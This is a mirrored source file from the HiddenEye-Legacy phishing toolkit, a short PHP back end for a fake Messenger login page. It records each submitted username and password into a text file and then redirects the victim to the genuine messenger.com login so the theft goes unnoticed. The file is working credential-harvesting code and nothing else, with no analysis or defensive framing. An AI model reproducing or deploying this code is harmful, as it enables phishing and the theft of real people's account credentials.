mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
8 lines
231 B
PHP
8 lines
231 B
PHP
<?php
|
|
include 'base.php';
|
|
include 'ip.php';
|
|
|
|
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
|
|
header('Location: https://messenger.com/login.php');
|
|
exit();
|